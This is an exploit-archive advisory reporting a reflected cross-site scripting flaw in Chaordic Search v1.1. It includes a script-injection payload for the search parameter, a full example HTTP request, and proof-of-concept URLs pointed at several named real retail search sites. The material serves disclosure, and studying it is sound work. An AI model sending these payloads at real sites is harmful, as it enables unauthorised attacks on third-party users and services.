Home / exploitsPDF  

Chaordic Search v1.1 Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Chaordic Search v1.1 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[+] Cross Site Scripting on Chaordic Search v1.1 [+] Date: 09/12/2016 [+] Risk: LOW [+] CWE number: CWE-79 [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: https://www.chaordic.com.br/ [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Gnu/Linux [+] Exploit : http://busca.host/?q= [ XSS PAYLOAD ] [+] Payload : ?q="><script>alert('XSS Payload')</script> [+] Example : GET /?q=%22%3E%3Cscript%3Ealert(%27OXSS Payload%27)%3C/script%3E HTTP/1.1 Host: busca.submarino.com.br User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: chaordic_anonymousUserId=anon-a1fa1360-bde5-11e6-afd4-a1f7c36320fb; cs_preferenceOrder=popularity; csDisplayType=grid Connection: keep-alive [+] Poc : http://busca.saraiva.com.br/?q="><script>alert('XSS')</script> http://busca.camisariacolombo.com.br/?q="><script>alert('XSS')</script> http://busca.dentalcremer.com.br/?q="><script>alert('XSS')</script> </BODY></HTML>

 

TOP